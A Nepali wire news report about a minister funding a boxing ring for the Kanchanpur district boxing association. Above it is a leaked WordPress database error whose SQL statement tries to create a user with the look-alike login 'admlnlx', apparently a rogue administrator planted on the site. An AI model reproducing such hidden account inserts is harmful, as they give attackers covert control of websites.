WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCDujDvcMegUIRagKtyzOhP/Y1r4Zh/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 06:13:24', '', 'admlnlx', 'admlnlx')
भीमदत्तनगर, पुस १० –
भौतिक पूर्वाधार तथा यातायातमन्त्री रमेश लेखकले जिल्ला बक्सिङ सङ्घ कञ्चनपुरलाई खेलाडीको प्रशिक्षणमा सहजताका लागि ‘बक्सिङ रिङ’ खरिद गर्न सांसद विकास कोषबाट रु १० लाख प्रदान गर्नुभएको छ ।
मन्त्री लेखक कञ्चनपुर क्षेत्र नं ४ बाट निर्वाचित सांसद समेत हुनुहुन्छ । जिल्ला बक्सिङ सङ्घका अध्यक्ष लोकबहादुर ठकुराठीले करिब दुई वर्ष नेपाली सेनाको श्री नं २५ बाहिनी अड्डा भगतपुर ब्यारेकको श्रमदान र स्थानीय दाताको सहयोगमा भीमदत्तनगरस्थित कबर्ड हल परिसरमा आधुनिक बक्सिङ प्रशिक्षण केन्द्र निर्माण भएको जानकारी दिनुभयो ।
केही समयअघि सांसद आनन्दी पन्तले बक्सिङ प्रशिक्षण केन्द्रमा केही अधुरा काम पूरा गर्न र खेलकुद सामग्री खरिद गर्न रु दुई लाख प्रदान गर्नुभएको थियो ।
२०४० सालदेखि कञ्चनपुरमा बक्सिङ खेलको सुरुआत भए पनि हालसम्म जिल्लामा रिङ तथा आवश्यक प्रशिक्षण सामग्री थिएन । बक्सिङ ओलम्पियन विष्णुबहादुर सिंह र डम्बरदत्त भट्टले यहाँ विकास गरेको बक्सिङमा पछिल्लो समय नयाँ खेलाडीको आकर्षण बढिरहेको छ । – रासस